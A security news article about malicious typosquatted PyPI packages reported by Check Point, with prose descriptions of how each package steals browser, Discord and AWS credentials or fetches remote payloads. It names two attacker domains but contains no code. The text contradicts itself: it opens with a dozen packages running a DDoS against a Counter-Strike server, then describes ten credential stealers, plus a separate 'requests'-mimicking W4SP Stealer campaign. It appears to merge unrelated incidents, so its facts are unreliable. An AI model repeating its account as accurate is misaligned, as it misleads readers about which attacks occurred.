PyPi Python Packages are the New Source of Supply Chain Attacks

CloudGuard Spectral detects 10 malicious packages on PyPI, the leading Python package index used by developers for Python.

A dozen malicious Python packages were uploaded to the PyPi repository this weekend in a typosquatting attack that performs DDoS attacks on a Counter-Strike 1.6 server. Python Package Index (PyPi) is a repository of open-source software packages that developers can easily incorporate into their Python projects to build complex apps with minimal effort. On August 8, CheckPoint published a report on ten malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers' data and credentials.

The malicious packages contained nearly identical code as 'requests', but were designed to write to a temporary file a one-liner Python script designed to fetch a next-stage script that in turn downloads and executes the final payload.

Called 'W4SP Stealer', the final payload is a Python trojan that collects saved cookies and passwords from browsers and Discord tokens and sends them to the threat actor via a Discord webhook.

Ten Pypi packages were used to steal credentials

The malicious PyPi packages discovered by CheckPoint and outlined in a new report are:

Ascii2text – Mimicking "art," a popular ASCII Art Library for Python, Ascii2text uses the same description minus the release details. Its code fetches a malicious script that searches for local passwords and exfiltrates them via a Discord webhook.

Pyg-utils, Pymocks, PyProto2 – All three packages target AWS credentials and appear very similar to another set of packages discovered by Sonatype in June. The first even connects to the same domain ("pygrata.com"), while the other two target "pymocks.com".

Test-async – Package with a vague description that fetches malicious code from a remote resource and notifies a Discord channel that a new infection has been established.

Free-net-VPN and Free-net-vpn2 – User credential harvester published to a site mapped by a dynamic DNS mapping service.

Zlibsrc – Mimicking the zlib project, this package contains a script that downloads and runs a malicious file from an external source.

Browserdiv – Package targeting the credentials of web design programmers. Uses Discord webhooks for data exfiltration.

WINRPCexploit – A credential-stealing package that promises to automate the exploitation of the Windows RPC vulnerability. However, when executed, the package will upload the server's environment variables, which commonly contain credentials, to a remote site under the attacker's control.

Background

PyPI is the leading Python repository and the most commonly in use by Python users. Every python developer is familiar with the 'pip install' daily routine to bring the Python software they need.

Pypi helps developers find and install software developed and shared by other developers of this community. The platform and its use are currently free and developers use the repository daily.  According to its website, Pypi has over 612,240 active users, working on 391,325 projects, with 3,664,724 releases.

What many users are not aware of is the fact that this one-liner simple command can put them at an elevated risk. The pip install command triggers a package installation which can include a setup.py script. This script can include Python snippets to make the required installation process at the target installer machine.

More Trending Stories